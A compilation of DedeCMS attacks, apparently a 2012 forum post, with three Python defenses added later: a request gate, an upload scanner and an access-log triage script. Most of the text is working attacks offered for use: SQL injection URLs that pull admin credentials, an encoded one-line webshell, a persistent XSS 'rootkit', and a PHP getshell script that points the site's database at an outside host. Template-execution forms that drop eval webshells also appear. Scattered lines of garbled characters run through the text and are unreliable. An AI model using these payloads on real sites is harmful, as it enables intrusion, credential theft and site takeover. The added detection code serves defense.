DedeCMS vulnerability summary

Posted 2012-10-18 10:42:14

Dedecms 5.6 rss injection vulnerability
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1

DedeCms v5.6 embedded malicious code execution vulnerability
Register as a member and upload a piece of software: in the "local address" field enter a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After posting, viewing or editing the entry executes it.
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
This generates x.php with password xiao, giving a one-line webshell directly.

2 n6 |6 Y. a+ ^: M) Q( [- D
: D: k0 z2 `+ {
5 ]; f$ x! n/ C; P( m. d" \
$ v, S) I4 n0 V5 g% e# ^4 o
  O" V8 ]( v2 G  N# R  }- r
8 ~& s2 W& [6 C3 {; w
4 R/ |  U/ q7 Z- I* t3 C

Dede 5.6 GBK SQL injection vulnerability

http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7

DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability

http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`

DEDECMS (all versions) gotopage variable XSS vulnerability
1. Copy and paste the URL below into the browser to trigger the XSS and install the "XSS rootkit". Note that IE8/9 and similar browsers block URL-based XSS, so their XSS filter has to be turned off.

http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="

2. Close the browser. Afterwards, visiting any of the URLs below in any way triggers our XSS.

http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda

http://v57.demo.dedecms.com/dede/login.php

DeDeCMS (Zhimeng) variable overwrite getshell
#!usr/bin/php -w
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author:
www.heixiaozi.comwww.webvul.com
');
echo "\r\n";
if($argv[2]==null){
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
Example:
php '.$argv[0].'
www.site.com 1 old
+---------------------------------------------------------------------------+
');
exit;
}
$url=$argv[1];
$aid=$argv[2];
$path=$argv[3];
$exp=Getshell($url,$aid,$path);
if (strpos($exp,"OK")>12){
echo "
Exploit Success \n";
if($aid==1)echo "
Shell:".$url."/$path/data/cache/fuck.php\n" ;
if($aid==2)echo "
Shell:".$url."/$path/fuck.php\n" ;
if($aid==3)echo "
Shell:".$url."/$path/plus/fuck.php\n";
}else{
echo "
Exploit Failed \n";
}
function Getshell($url,$aid,$path){
$id=$aid;
$host=$url;
$port="80";
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
$data .= "Host: ".$host."\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
//$data .= "Accept-Encoding: gzip,deflate\r\n";
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
$data .= "Connection: keep-alive\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
$data .= $content."\r\n";
$ock=fsockopen($host,$port);
if (!$ock) {
echo "
No response from ".$host."\n";
}
fwrite($ock,$data);
while (!feof($ock)) {
$exp=fgets($ock, 1024);
return $exp;
}
}
?>

DedeCms v5.6-5.7 unauthorized access vulnerability (direct entry to the admin backend)

http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

Change validate=dcug above to the current captcha value and you can go straight into the site's admin backend.

The precondition for this vulnerability is that the backend path must already be known.
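
The exploit script above and the login bypass just shown share one root cause: client-supplied parameter names such as _COOKIE[GLOBALS][cfg_dbhost] or _POST[GLOBALS][cfg_dbuser] end up in the application's global configuration. The Python below is an added example, not part of the original post and not DedeCMS code. It is a request gate that rejects any parameter from the query string, a urlencoded body or the Cookie header whose name begins with a configuration or superglobal prefix, after normalising the name the way PHP does so the gate and the application see the same key. The prefix list, the function names and the 203.0.113.x hosts in the samples are this example's own assumptions.

```python
from __future__ import annotations

import re
from urllib.parse import parse_qsl, unquote

# Parameter-name prefixes that must never be accepted from a client. This
# list is the example's assumption; it is not copied from the DedeCMS source.
FORBIDDEN_PREFIX = re.compile(
    r"^(cfg_|GLOBALS|_GET|_POST|_COOKIE|_REQUEST|_SESSION|_SERVER|_FILES|_ENV)",
    re.IGNORECASE,
)


def php_variable_name(raw: str) -> str:
    """Normalise a parameter name the way PHP does before it becomes a
    $_GET/$_POST/$_COOKIE key: leading spaces are dropped, and '.' and ' '
    in the base name (the part before the first '[') become '_'."""
    name = raw.lstrip(" ")
    base, bracket, index = name.partition("[")
    base = base.replace(".", "_").replace(" ", "_")
    return base + bracket + index


def cookie_pairs(header: str) -> list[tuple[str, str]]:
    """Split a raw Cookie header into percent-decoded (name, value) pairs."""
    pairs = []
    for part in header.split(";"):
        name, _, value = part.strip().partition("=")
        if name:
            pairs.append((unquote(name), unquote(value)))
    return pairs


def forbidden_parameters(query: str = "", body: str = "", cookie: str = "") -> list[str]:
    """Return every client-supplied parameter name (query string, urlencoded
    body, Cookie header) that could overwrite server-side configuration."""
    names: list[str] = []
    for encoded in (query, body):
        names.extend(name for name, _ in parse_qsl(encoded, keep_blank_values=True))
    names.extend(name for name, _ in cookie_pairs(cookie))
    normalised = [php_variable_name(n) for n in names]
    return [n for n in normalised if FORBIDDEN_PREFIX.match(n)]


def should_reject(query: str = "", body: str = "", cookie: str = "") -> bool:
    """Gate decision: True when the request must be refused before any
    application code runs."""
    return bool(forbidden_parameters(query, body, cookie))


if __name__ == "__main__":
    # Constructed sample requests shaped like the ones in the post; 203.0.113.x
    # are documentation addresses, not real servers.
    samples = {
        "mytag_js body": dict(
            body="doaction=http%3A%2F%2F203.0.113.10%2Fplus%2Fmytag_js.php%3Faid%3D1"
                 "&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=203.0.113.5"
                 "&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&nocache=true"),
        "login query": dict(
            query="dopost=login&validate=dcug&userid=admin&pwd=x"
                  "&_POST[GLOBALS][cfg_dbhost]=203.0.113.5"),
        "select_soft_post body": dict(
            body="activepath=/data/cache/&cfg_basedir=../../&cfg_imgtype=php&job=upload"),
        "benign edit": dict(body="aid=2&dopost=save&title=hello"),
    }
    for label, req in samples.items():
        print(f"{label:24s} reject={should_reject(**req)} {forbidden_parameters(**req)}")
```

The gate runs before any application code, so it also covers the select_soft_post.php case later in this post, where plain cfg_basedir and cfg_imgtype fields (rather than GLOBALS) are overwritten.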

Dedecms (Zhimeng) tag remote file write vulnerability
Precondition: you must have your own dede database ready, then insert the data: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');

Then submit with the form below, and the shell is 1.php in the same directory. Work out the principle yourself...
<form action="" method="post" name="QuickSearch" id="QuickSearch">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>

Dedecms <= V5.6 Final template execution vulnerability
Register a user, enter the member backend, post an article and upload an image; then, in attachment management, replace the image with our specially crafted template. For example, the image name is:
uploads/userup/2/12OMX04-15A.jpg

The template content is (if the image format is checked, prepend gif89a):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
2. Edit the article just posted, view the page source, and construct a form:
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />
<div id="mainCp">
<h3 class="meTitle"><strong>修改文章</strong></h3>
<div class="postForm">
<label>标题:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
<label>标签TAG:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
<label>作者:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
<label>隶属栏目:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>测试栏目</option>
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
<label>我的分类:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>
<label>信息摘要:</label>
<textarea name="description" id="description">1111111</textarea>
(内容的简要说明)
<label>缩略图:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
<input type='text' name='templet'
value="../ uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields'
value="templet,htmltext;">(craft this part)
</div>
<!-- form action area -->
<h3 class="meTitle">详细内容</h3>
<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
<label>验证码:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
<button class="button2" type="submit">提交</button>
<button class="button2 ml10" type="reset">重置</button>
</div>
</div>
</form>

Submit; if it reports that the edit succeeded, we have successfully changed the template path.
3. Visit the edited article:
Assuming the aid of the article just edited is 2, we only need to visit:

http://127.0.0.1/dede/plus/view.php?aid=2
and the webshell 1.php is generated in the plus directory.

DEDECMS website management system Get Shell vulnerability (5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save as 1.gif
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit" >更改</button>
</form>

Construct the form above; after uploading, the image is saved as /uploads/userup/3/1.gif
Post an article, then construct the edit form as follows:

<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">提交</button>
</form>
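
Both the template execution section and the Get Shell section above depend on a member upload that is named like an image but actually carries DedeCMS template tags (runphp='yes', {dede:php}), sometimes behind a "Gif89a" prefix, and on the templet field later pointing the renderer at that file. As an added example that is not from the original post or from DedeCMS, the Python below checks an upload the way a defender's upload filter or a periodic scan of uploads/userup/ would: genuine magic bytes (case-sensitive, so the "Gif89a" prefix used above does not pass), agreement between extension and content, and no template or PHP markers anywhere in the file. The image signatures are standard; the marker list, thresholds and function names are this example's own assumptions.

```python
from __future__ import annotations

import re
from pathlib import Path

# Magic bytes of the image types a member upload form usually allows.
IMAGE_MAGIC = {
    b"GIF87a": "gif",
    b"GIF89a": "gif",
    b"\xff\xd8\xff": "jpg",
    b"\x89PNG\r\n\x1a\n": "png",
}
EXT_KIND = {"gif": "gif", "jpg": "jpg", "jpeg": "jpg", "png": "png"}

# Markers that have no business inside an image. The DedeCMS tag syntax is
# taken from the payloads in this post; treating any occurrence as hostile is
# this example's policy choice (assumption), not a vendor rule.
SUSPICIOUS = [
    (re.compile(rb"\{/?dede:", re.I), "dedecms template tag"),
    (re.compile(rb"runphp\s*=\s*['\"]?\s*yes", re.I), "runphp attribute"),
    (re.compile(rb"<\?php|<\?=", re.I), "php open tag"),
    (re.compile(rb"\b(?:eval|fopen|fwrite|fputs|system|passthru|phpinfo)\s*\(", re.I),
     "php function call"),
]


def sniff_image(data: bytes) -> str | None:
    """Return the image kind from the leading magic bytes, or None.
    The comparison is case-sensitive: 'Gif89a' is not a GIF header."""
    for magic, kind in IMAGE_MAGIC.items():
        if data.startswith(magic):
            return kind
    return None


def scan_upload(data: bytes, filename: str) -> list[str]:
    """Return the findings for one uploaded file; an empty list means clean."""
    findings: list[str] = []
    ext = Path(filename).suffix.lower().lstrip(".")
    kind = sniff_image(data)
    if kind is None:
        findings.append("no valid image header")
    elif EXT_KIND.get(ext) != kind:
        findings.append(f"extension .{ext} does not match {kind} content")
    for pattern, label in SUSPICIOUS:
        if pattern.search(data):
            findings.append(label)
    return findings


def scan_directory(root: str) -> dict[str, list[str]]:
    """Scan every file under root (for instance uploads/userup/) and return
    the files that produced findings."""
    results: dict[str, list[str]] = {}
    for path in Path(root).rglob("*"):
        if path.is_file():
            found = scan_upload(path.read_bytes(), path.name)
            if found:
                results[str(path)] = found
    return results


if __name__ == "__main__":
    # Constructed samples: the two upload bodies quoted in this post and a
    # genuine 1x1 GIF for comparison.
    samples = {
        "1.gif": b"Gif89a{dede:field name='toby57' runphp='yes'}\nphpinfo();\n{/dede:field}",
        "12OMX04-15A.jpg": b"{dede:name runphp='yes'}\n$fp = @fopen(\"1.php\", 'a');\n@fclose($fp);\n{/dede:name}",
        "logo.gif": b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff!\xf9\x04\x01\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;",
    }
    for name, data in samples.items():
        print(f"{name:18s} {scan_upload(data, name) or 'clean'}")
```

Rejecting at upload time is the primary control; running scan_directory over the existing upload tree afterwards finds files that got in before the filter existed. Neither replaces the real fix, which is to never let a member-controlled path reach the templet field.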

Zhimeng (Dedecms) V5.6 remote file deletion vulnerability
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif

Zhimeng (Dedecms) V5.6 plus/carbuyaction.php local file inclusion vulnerability

http://www.test.com/plus/carbuya ... urn&code=../../
) f" N5 t7 c# H3 y! \& z2 S5 M
0 `) _& E: e0 {# H& b
8 S' n) W+ X4 X1 x* e2 q  L
, x2 S) A9 I6 w2 Q8 G+ n2 c* ?3 J
; `; _3 l8 N$ k% a" s7 F( ~) U

- V$ x8 I! s: _/ W' ]% r1 A9 z5 i
+ {( G- |+ [9 C& S
3 \: Z% r/ y1 I7 d. b* O: @: ]6 S" N


DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
The stored password is the 32-character MD5 with the first 5 and the last 7 characters removed, which gives the 20-character MD5 value; from that, drop 3 more from the front and 1 from the end to get the 16-character MD5.

Zhimeng (Dedecms) 5.1 feedback_js.php injection vulnerability
/ ?! ?: R% Q* F0 }7 Q- J! \http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='

Zhimeng (Dedecms) select_soft_post.php uninitialized page variable vulnerability
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
</form>
<br />It's just a exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>

Zhimeng (dedecms) 5.3 - 5.5 plus/digg_frame.php injection vulnerability
It exploits a MySQL numeric field overflow that raises an error, combined with DEDECMS writing database error messages into a PHP file whose header is not validated.
1. Visit the URL:
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
The error message is visible.

2. Visit
http://www.abc.com/data/mysql_error_trace.php; seeing the following output proves the injection succeeded.
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>

3. Run the file test.html from dede.rar; note that the action address in the form is

<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">

After clicking confirm, seeing the output from step 2 means the trojan file was uploaded successfully.

: [) p- r* \- G* n; G9 B- o织梦(DedeCms)plus/infosearch.php 文件注入漏洞7 c. F: h$ F) }0 D
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
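
Nearly every payload in this post travels in the request line, so most of them are visible in an ordinary web server access log. The Python below is an added example, not code from the original post or from DedeCMS: a triage script that parses combined-format log lines, percent-decodes the request target, and flags the request shapes quoted above (GLOBALS and cfg_ overwrite, the advancedsearch.php sql parameter, the rss.php _Cs array, union/updatexml injection, a quote in the member uid, the gotopage XSS, oldface and carbuyaction traversal, PHP tags aimed at digg_frame.php, and reads of data/mysql_error_trace.php). The log lines are constructed samples using documentation addresses, and the rule names and regexes are this example's own, not vendor signatures.

```python
from __future__ import annotations

import re
from collections import Counter
from urllib.parse import unquote_plus

# Combined-format access log line; only ip, target and status are used.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Detection rules applied to the decoded request target. Request shapes come
# from this post; names, regexes and the alert-on-any-match policy are this
# example's assumptions.
RULES = [
    ("globals-overwrite", re.compile(r"[?&]\s*(?:_cookie|_post|_get|_request)\[globals\]|[?&]globals\[", re.I)),
    ("cfg-overwrite", re.compile(r"[?&]cfg_\w+=", re.I)),
    ("advancedsearch-raw-sql", re.compile(r"advancedsearch\.php\?.*[?&]sql=", re.I)),
    ("rss-_Cs-injection", re.compile(r"rss\.php\?.*_cs\[", re.I)),
    ("sql-union-select", re.compile(r"union\s+(?:all\s+)?select", re.I)),
    ("sql-error-based", re.compile(r"(?:updatexml|extractvalue)\s*\(", re.I)),
    ("member-uid-quote", re.compile(r"member/index\.php\?.*uid=[^&]*'", re.I)),
    ("gotopage-xss", re.compile(r"gotopage=[^&]*<", re.I)),
    ("edit_face-traversal", re.compile(r"edit_face\.php\?.*oldface=[^&]*\.\./", re.I)),
    ("carbuyaction-lfi", re.compile(r"carbuyaction\.php\?.*code=[^&]*\.\./", re.I)),
    ("digg_frame-php-tag", re.compile(r"digg_frame\.php\?.*(?:<\?|\?>|eval\s*\()", re.I)),
    ("mysql_error_trace-access", re.compile(r"/data/mysql_error_trace\.php", re.I)),
]


def decode_target(target: str) -> str:
    """Percent-decode up to three times so a double-encoded payload is seen
    in the form the application eventually parses."""
    for _ in range(3):
        decoded = unquote_plus(target)
        if decoded == target:
            break
        target = decoded
    return target


def triage_line(line: str) -> dict | None:
    """Return an alert dict for one log line, or None when no rule matches."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    target = decode_target(m.group("target"))
    hits = [name for name, pattern in RULES if pattern.search(target)]
    if not hits:
        return None
    return {"ip": m.group("ip"), "status": m.group("status"),
            "target": m.group("target"), "rules": hits}


def triage(lines: list[str]) -> list[dict]:
    return [alert for alert in (triage_line(l) for l in lines) if alert]


def hits_per_source(alerts: list[dict]) -> Counter:
    """Count alerts per client address; one address tripping many different
    rules in a short window is the pattern worth escalating."""
    return Counter(a["ip"] for a in alerts)


# Constructed sample log; 203.0.113.x and 198.51.100.x are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.7 - - [18/Oct/2012:10:42:14 +0800] "GET /plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20%60%23@__admin%60 HTTP/1.1" 200 1843 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [18/Oct/2012:10:42:20 +0800] "GET /dede/login.php?dopost=login&validate=abcd&userid=admin&pwd=x&_POST[GLOBALS][cfg_dbhost]=203.0.113.9 HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [18/Oct/2012:10:42:31 +0800] "GET /dede/login.php?gotopage=%22%3E%3Cscript%3Ealert(1)%3C/script%3E%3Cx=%22 HTTP/1.1" 200 2210 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [18/Oct/2012:10:43:02 +0800] "GET /member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif HTTP/1.1" 200 310 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [18/Oct/2012:10:43:15 +0800] "GET /plus/feedback_js.php?arcurl=%27%20union%20select%201,2,userid,4,pwd%20from%20dede_admin%23 HTTP/1.1" 200 988 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [18/Oct/2012:10:43:40 +0800] "GET /plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20updatexml%281,1,1%29%23][0]=1 HTTP/1.1" 500 0 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [18/Oct/2012:10:44:01 +0800] "GET /plus/view.php?aid=2 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [18/Oct/2012:10:44:09 +0800] "POST /plus/mytag_js.php?aid=1 HTTP/1.1" 200 64 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    alerts = triage(SAMPLE_LOG)
    for a in alerts:
        print(a["ip"], a["status"], a["rules"], a["target"][:60])
    print(hits_per_source(alerts))
```

One limitation the last sample line makes visible: the POST to mytag_js.php looks harmless here because the _COOKIE[GLOBALS] overwrite travels in the request body, which an access log does not record. That class needs a request-body check inside the application or at a WAF, not log review.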